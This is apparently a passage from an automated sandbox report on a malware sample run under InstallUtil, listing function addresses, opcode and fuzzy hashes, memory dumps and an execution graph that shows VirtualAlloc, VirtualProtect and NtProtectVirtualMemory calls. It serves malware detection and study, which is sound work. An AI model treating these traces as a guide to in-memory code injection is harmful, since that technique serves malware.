                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f062551e07c1ece7efcf7185281e36b8e42e4ba66098391aae0c0903adebafd2
                                                                • Instruction ID: d5c4d3fe8fd0129b5c1f434d835d7df9b6c237baf48cdf24c522b22df7d11fef
                                                                • Opcode Fuzzy Hash: f062551e07c1ece7efcf7185281e36b8e42e4ba66098391aae0c0903adebafd2
                                                                • Instruction Fuzzy Hash: 1921FD306081089FCB199F68D805BAB7BA2FB88305F104068F9068B344CB74CED9CBA5
                                                                Function 00C5D61F Relevance: .1, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 45b3ecf3393d8842c401f7abe9e0fa7656bf95ca6ba49d19b4199509ad6d034d
                                                                • Instruction ID: bb3d9ebcb657e982637dc535cb27777bcda40b4bb571795045090157631f02ec
                                                                • Opcode Fuzzy Hash: 45b3ecf3393d8842c401f7abe9e0fa7656bf95ca6ba49d19b4199509ad6d034d
                                                                • Instruction Fuzzy Hash: A411BE74D046488BDB18CFBAC8442DEBBB2AFCE312F58C065D818AB266DB304846CF54
                                                                Function 00C55A77 Relevance: .1, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 907437ad854166af1d64661afc73965fe9b0e3ce779ef042f1debf0482f436d3
                                                                • Instruction ID: 59618bf60a226be304bd25742d8d80f3fb16995d866b2b8124a31ba71607aea5
                                                                • Opcode Fuzzy Hash: 907437ad854166af1d64661afc73965fe9b0e3ce779ef042f1debf0482f436d3
                                                                • Instruction Fuzzy Hash: 3011E9397049119FC7199B39D8A463E7792BFC47527150279ED06CB360CF31DC468780
                                                                Function 00C59B57 Relevance: .1, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 31da711abccb9b4d8fddb4982164abf5b012937310c834d705e4227757d6641b
                                                                • Instruction ID: 1f38b2b218b38af9aaa81aa2b541aa747d6878294e5c886978b2be2fdc297b78
                                                                • Opcode Fuzzy Hash: 31da711abccb9b4d8fddb4982164abf5b012937310c834d705e4227757d6641b
                                                                • Instruction Fuzzy Hash: 88110635A00249DFDF20CF69C840B9EBBF2EF84311F048295D8149B291D370F898CB99
                                                                Function 00C56747 Relevance: .1, Instructions: 57COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7ac7ac4733b6020ea5fdf7f258de0e66e126b929fdbfb55727b0eb8bbdecb428
                                                                • Instruction ID: f557017ffc31073cd064f052596c34ee1b37daf2332fdc06eaf21bd57739884a
                                                                • Opcode Fuzzy Hash: 7ac7ac4733b6020ea5fdf7f258de0e66e126b929fdbfb55727b0eb8bbdecb428
                                                                • Instruction Fuzzy Hash: E5117C359002089FDB24CF94C848BAABBF5EB48355F40C56EE8199B251D775DA98CF50
                                                                Function 00BFD3FF Relevance: .1, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476127713.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_bfd000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                • Instruction ID: 0b328ff9c9545a8aec4f79adcf028194656aaab1fb8c277385f88a86b131b7fb
                                                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                • Instruction Fuzzy Hash: A711E472404244CFCB12CF00D5C4B26BFB2FB94314F24C5A9D9090B656C336E45ACBA1
                                                                Function 00BFD4EB Relevance: .1, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476127713.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_bfd000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                • Instruction ID: a72fea22f50397a2321b9d6449882306ce68b68bd1b5d1ddb147fb22df83c630
                                                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                • Instruction Fuzzy Hash: E811D376504244CFDB16DF10D5C4B26BFB2FBA8314F24C5A9D9090B256C336D85ADBA2
                                                                Function 05559999 Relevance: .1, Instructions: 55COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: edbd1e89a971e1fa98b6220757084218e05185bfcb6c39877a076c8a3fb56b0f
                                                                • Instruction ID: b394277b03366358893af00d57744fda92c5175fe677b955b9bd375aed461f45
                                                                • Opcode Fuzzy Hash: edbd1e89a971e1fa98b6220757084218e05185bfcb6c39877a076c8a3fb56b0f
                                                                • Instruction Fuzzy Hash: 521123B6800249DFDB10DF99C845BDEBFF8FB48320F14841AEA58A7250C339A590DFA5
                                                                Function 0555E0CF Relevance: .1, Instructions: 55COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7900a98be246c3a2faae3c30b9ccf111a74c6119f422f0b064f0d364be6023a3
                                                                • Instruction ID: 7c32f99ab6a85283693ee708277ba68070e60db0f4a84d30920c62b84833e436
                                                                • Opcode Fuzzy Hash: 7900a98be246c3a2faae3c30b9ccf111a74c6119f422f0b064f0d364be6023a3
                                                                • Instruction Fuzzy Hash: 4701B9307052445FD705567A5C656BFAEDFAFCA350F1445BBE906C72D6CD288D0AC360
                                                                Function 05559328 Relevance: .1, Instructions: 55COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7ecaae432d6f44f29e8ff6bfb6172910c81b65466b775cb4ade4afc2905fb843
                                                                • Instruction ID: bb9b1504d476883f12cfb445b8b82ee93fa8560e643f514dc91da3189369deb8
                                                                • Opcode Fuzzy Hash: 7ecaae432d6f44f29e8ff6bfb6172910c81b65466b775cb4ade4afc2905fb843
                                                                • Instruction Fuzzy Hash: 621126B6800249DFDB10DF99C945BEEBFF5FB48320F14841AE958A7610C339A950DFA5
                                                                Function 00C5E217 Relevance: .1, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ee357be3630c6cd244906de13e77a0b784e6aca918e93bc44689582709d39972
                                                                • Instruction ID: 68ba265ae0943eaa13cfd9a3fefc06f930bd91aa5613988861b65488bcdb0f7d
                                                                • Opcode Fuzzy Hash: ee357be3630c6cd244906de13e77a0b784e6aca918e93bc44689582709d39972
                                                                • Instruction Fuzzy Hash: 23216DB4D041099FCB49EFB8D981B9EBFF6FF45300F5085A9D0149B269E7744A49CB80
                                                                Function 00C5E218 Relevance: .1, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c55910bbc1bd15f407b20f6406f1e6f6923bab0ba80b2ce5b1ee87771be02ca3
                                                                • Instruction ID: 59776f772a5c7b9cbcf566c685b7584288e180709ccc58acc83113ef19dbf8dd
                                                                • Opcode Fuzzy Hash: c55910bbc1bd15f407b20f6406f1e6f6923bab0ba80b2ce5b1ee87771be02ca3
                                                                • Instruction Fuzzy Hash: BE117CB4D001099FCB49EFB8D981B9EBBF6FF44300F4085A9D0189B269EB345A49CB80
                                                                Function 00C51F61 Relevance: .1, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 259b78a41c12f25d8c584773226e6f3f4ba36f083775519311cdb5c98a45abda
                                                                • Instruction ID: 17e1557e8e9958e8ba0e888c88d7fb78420b3dae7ad2eebe6049ede2f2bbc979
                                                                • Opcode Fuzzy Hash: 259b78a41c12f25d8c584773226e6f3f4ba36f083775519311cdb5c98a45abda
                                                                • Instruction Fuzzy Hash: 7221E2B4D052098FCB01EFA8C9456EEBFF4BB09301F14426AD805B7261EB305A49CFA1
                                                                Function 05558EC1 Relevance: .1, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 72e3f430ba233f3cd0e21023c908e3786b4ea946e75c22f219d577b1e33fa963
                                                                • Instruction ID: 87ca2d287121dc29378ed3c709c917ba6a9d0a433f24441c2fdf6e47c64b4b36
                                                                • Opcode Fuzzy Hash: 72e3f430ba233f3cd0e21023c908e3786b4ea946e75c22f219d577b1e33fa963
                                                                • Instruction Fuzzy Hash: 19110074F001498FDB05DFE8D960BEEBBB6BF48321F509465E908A7349E7309942CB50
                                                                Function 00C0D03F Relevance: .1, Instructions: 53COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476233079.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c0d000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                • Instruction ID: 1ff44c69491d41cdff694b5cf377ad07c925ba35eff1d6a3408480ebd8565773
                                                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                • Instruction Fuzzy Hash: 3D11DD75504284CFCB12CF50D9C4B15BFA2FB84328F24C6A9D84A4B692C33AD84ACF62
                                                                Function 00C5560F Relevance: .1, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 61cf4b2c5dfe58dbfa9b7064cf825da69738f48ee237961444c8d5b18b8e25db
                                                                • Instruction ID: fe663ec8da5af7d40a984c9b74886bbbc644c0748275cd500a0a203e3363cbbc
                                                                • Opcode Fuzzy Hash: 61cf4b2c5dfe58dbfa9b7064cf825da69738f48ee237961444c8d5b18b8e25db
                                                                • Instruction Fuzzy Hash: DF01F571604244AFCB028E659810BFF3BE7DFC9762F18807AF914CB290CE758D468BA1
                                                                Function 05559760 Relevance: .0, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9c580b5243523737c4df9aa8bf045529fdef1d65124a8f1a63711b4e7de9bafc
                                                                • Instruction ID: 7b1a2eb636b5d1d6183812ddb4d3dbf288242bf2e1aff9a109fb7e3a9945fbda
                                                                • Opcode Fuzzy Hash: 9c580b5243523737c4df9aa8bf045529fdef1d65124a8f1a63711b4e7de9bafc
                                                                • Instruction Fuzzy Hash: 7AF089363001196F8F055FA9A8519EF7BAFEFC8360B40482AFA05C7351DE359D1197A5
                                                                Function 00C5D459 Relevance: .0, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7d39db9482febd57d9a8699affdf00bb504c015554e6a2781f0a9b48f8f60ee7
                                                                • Instruction ID: 1eddaf05f3ecee1951924dc79e73bcc54b7cd90faa61b65c18f14209f0a3971b
                                                                • Opcode Fuzzy Hash: 7d39db9482febd57d9a8699affdf00bb504c015554e6a2781f0a9b48f8f60ee7
                                                                • Instruction Fuzzy Hash: 55F055309046849EEB028B75AC143FE7F709B8F312F8850A8D4449B162CB764506CB50
                                                                Function 00C5DF18 Relevance: .0, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3a07e52ebf80ecf18e5faa55add46c86733efccf9cb5cf1474ad8e71ea1ccb81
                                                                • Instruction ID: 1506372e2ae7a0a4eb42a229c67bc704837d4171c005a93a1a5bf3ef4b1a7c92
                                                                • Opcode Fuzzy Hash: 3a07e52ebf80ecf18e5faa55add46c86733efccf9cb5cf1474ad8e71ea1ccb81
                                                                • Instruction Fuzzy Hash: 74F05534908284CFCB068BB49C183FA7B709BCB302F0804A8C401660B2DBB1861DCA80
                                                                Function 00C5D4C4 Relevance: .0, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 04426169f61a4d7812eee36d2bcffe35674aa9ea305bfc5615252b9e1bb0665d
                                                                • Instruction ID: 6a174e62bbab5b66c0a2922abe4906a94dde7329a40a513acd4f8a1eb963845a
                                                                • Opcode Fuzzy Hash: 04426169f61a4d7812eee36d2bcffe35674aa9ea305bfc5615252b9e1bb0665d
                                                                • Instruction Fuzzy Hash: 37E0D896C08240CFD7218BA654160B97F34CCE734374450D7D44687121E328D659EB15
                                                                Function 00C52010 Relevance: .0, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b4daed2cfd1a45aaf6806d52260fcf406c7e8e5132fc03659df95acd11a25c56
                                                                • Instruction ID: 8aeb4b75e5d81e1cb6950ffc716f5efe498befb0ac72fa85af4a6534b85214d8
                                                                • Opcode Fuzzy Hash: b4daed2cfd1a45aaf6806d52260fcf406c7e8e5132fc03659df95acd11a25c56
                                                                • Instruction Fuzzy Hash: 82E0D831D293975ECB0297B09C184EEBF309ED3210B1A46ABE4A0AB091D770191BC761
                                                                Function 00C52020 Relevance: .0, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9e41d973b12e8daf9ca454625af0aa47aa8884159fe5bdf385c818cdd3d0a087
                                                                • Instruction ID: abe0d539bdd350f02f572a56405242d6caece130a91899ba2cdc6af8340b7287
                                                                • Opcode Fuzzy Hash: 9e41d973b12e8daf9ca454625af0aa47aa8884159fe5bdf385c818cdd3d0a087
                                                                • Instruction Fuzzy Hash: DFD05B31D2022B57CB01E7A5DC044EFF738EED6261B544666D51437154FB702659C6E1
                                                                Function 00C58270 Relevance: .0, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                • Instruction ID: dad4124125f479e62ba202c0e2035997f3794693ec5dd19ff8d62e96de2bea6b
                                                                • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                • Instruction Fuzzy Hash: 0EC0123720C6282AA624108F7C44AA7AA8CE2C1BB6A250137F96CA320098429C8C01E8
                                                                Function 00C5A71D Relevance: .0, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 573d91800f847d648a2cd52432dd13e25062562b9089bba4d50df138b1400ac0
                                                                • Instruction ID: fbea1b8b3863084a9740f15111bba6e55aaf2a8f5b98ff7719f11989cf4ec992
                                                                • Opcode Fuzzy Hash: 573d91800f847d648a2cd52432dd13e25062562b9089bba4d50df138b1400ac0
                                                                • Instruction Fuzzy Hash: 60D0677AB410189FCB049F98EC409DEBBB6FB9C221B048116E915A3261C6319921DB50
                                                                Function 00C5FBFB Relevance: .0, Instructions: 15COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d83cb6a4e1a52294d45c7429cca1efff58e76abbb7091202b7c747ac1b1e1df8
                                                                • Instruction ID: 8aa1c09ae8432b632402a6745a6a02865c0d11f3a72ff31811be84a95057175b
                                                                • Opcode Fuzzy Hash: d83cb6a4e1a52294d45c7429cca1efff58e76abbb7091202b7c747ac1b1e1df8
                                                                • Instruction Fuzzy Hash: 78D06C7894412C8BCB20DFA9EA557ECB7B0EF89301F0025E69D09B2220D6305A94AF26
                                                                Function 00C55EC0 Relevance: .0, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ac9970a5dad7881adc9db63e6cf6cea1ec4265c383876fe85f9038e650829234
                                                                • Instruction ID: c6eef44b4683094ae492652fdf8ac8bda70afaae064bac62bb86c63c7264630a
                                                                • Opcode Fuzzy Hash: ac9970a5dad7881adc9db63e6cf6cea1ec4265c383876fe85f9038e650829234
                                                                • Instruction Fuzzy Hash: C6C012305443094BC505FBB5FB45B19375EAAC0704F404660B2090E22DDF7C594D86A2
                                                                Function 00C55EBF Relevance: .0, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d5b80c08faa237daa693c150949bbab64dc2390addf7c1fdf5fa0c0bde4f2b0d
                                                                • Instruction ID: 1d9e3c110b28306ddb123e65bce7dd9c37bcae756e95771ea86c6986006ec752
                                                                • Opcode Fuzzy Hash: d5b80c08faa237daa693c150949bbab64dc2390addf7c1fdf5fa0c0bde4f2b0d
                                                                • Instruction Fuzzy Hash: 9DD0C9345882494ACA06EBB5BA85A593B6AAA80304F044664B5460E62EDAB9454D8A52

                                                                Non-executed Functions

                                                                Function 05552807 Relevance: 14.1, Strings: 11, Instructions: 388COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: "$0oMp$Hnq$PHjq$PHjq$PHjq$PHjq$PHjq$PHjq$PHjq$PHjq
                                                                • API String ID: 0-1284651843
                                                                • Opcode ID: 024943d62971ea3f0312312ec59aa3cd36641bedf5d4d861f85cc1db27909517
                                                                • Instruction ID: 8c68039853c8d5a31d3678828c53600acf084d41161b6798204d12f437f05fd5
                                                                • Opcode Fuzzy Hash: 024943d62971ea3f0312312ec59aa3cd36641bedf5d4d861f85cc1db27909517
                                                                • Instruction Fuzzy Hash: EE12C3B4E002188FDB58DF65D994BDDBBB2BF89300F1080A9D809AB365DB759E85CF50
                                                                Function 00C521E2 Relevance: 5.1, Strings: 4, Instructions: 90COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Xnq$Xnq$Xnq$Xnq
                                                                • API String ID: 0-1335687363
                                                                • Opcode ID: f57d536448d5723c80d709155d9e7960ebac98178388cf413c8288e8a8ff669f
                                                                • Instruction ID: 400d636891179fd6b137ee9ba246bd91c614ace802117391dde4776dd0691f49
                                                                • Opcode Fuzzy Hash: f57d536448d5723c80d709155d9e7960ebac98178388cf413c8288e8a8ff669f
                                                                • Instruction Fuzzy Hash: C731A738E002198BDF648B68C94576FB6F6BF9A311F244179C825A7254DB30CEC9CB96
                                                                Function 00C560A0 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \;jq$\;jq$\;jq$\;jq
                                                                • API String ID: 0-138087212
                                                                • Opcode ID: edad131f8cfcad684c5f691d0ed30b5f80b1c438c5f25b5825c2c88ed445b247
                                                                • Instruction ID: f18ce3b285d8662b8541f453a229180a3cee99f85322aff3bbb2311b285fa252
                                                                • Opcode Fuzzy Hash: edad131f8cfcad684c5f691d0ed30b5f80b1c438c5f25b5825c2c88ed445b247
                                                                • Instruction Fuzzy Hash: BE01BC397405248FC7208E2DC55092A77EAAFD8762365816AE812CB3F0DE32DCC98788

                                                                Execution Graph

                                                                Execution Coverage:10.3%
                                                                Dynamic/Decrypted Code Coverage:98.6%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:279
                                                                Total number of Limit Nodes:7
                                                                execution_graph 57007 1703cb0 57008 1703ccc 57007->57008 57009 1703cdc 57008->57009 57013 6e92ea3 57008->57013 57016 6e97a14 57008->57016 57020 6e92272 57008->57020 57023 6e9d9a0 57013->57023 57017 6e97a33 57016->57017 57019 6e9d9a0 VirtualProtect 57017->57019 57018 6e901da 57019->57018 57022 6e9d9a0 VirtualProtect 57020->57022 57021 6e901da 57022->57021 57025 6e9d9c7 57023->57025 57027 6e9ddf0 57025->57027 57028 6e9de38 VirtualProtect 57027->57028 57030 6e92ebe 57028->57030 56977 6e9ee68 56978 6e9eea8 VirtualAlloc 56977->56978 56980 6e9eee2 56978->56980 57035 151d030 57036 151d048 57035->57036 57037 151d0a3 57036->57037 57039 6e9e458 57036->57039 57040 6e9e480 57039->57040 57043 6e9e918 57040->57043 57041 6e9e4a7 57044 6e9e945 57043->57044 57045 6e9d9a0 VirtualProtect 57044->57045 57047 6e9eadb 57044->57047 57046 6e9eacc 57045->57046 57046->57041 57047->57041 57031 6da5798 57032 6da57e6 NtProtectVirtualMemory 57031->57032 57034 6da5830 57032->57034 57048 6d50ab7 57049 6d50ac1 57048->57049 57053 6e20880 57049->57053 57057 6e20870 57049->57057 57050 6d50aff 57054 6e20895 57053->57054 57055 6e208ab 57054->57055 57061 6e20d99 57054->57061 57055->57050 57058 6e20895 57057->57058 57059 6e208ab 57058->57059 57060 6e20d99 14 API calls 57058->57060 57059->57050 57060->57059 57062 6e20da3 57061->57062 57066 6e221e0 57062->57066 57070 6e221d1 57062->57070 57067 6e221f5 57066->57067 57074 6e223fa 57067->57074 57071 6e221e3 57070->57071 57073 6e223fa 14 API calls 57071->57073 57072 6e20f05 57073->57072 57075 6e22701 57074->57075 57081 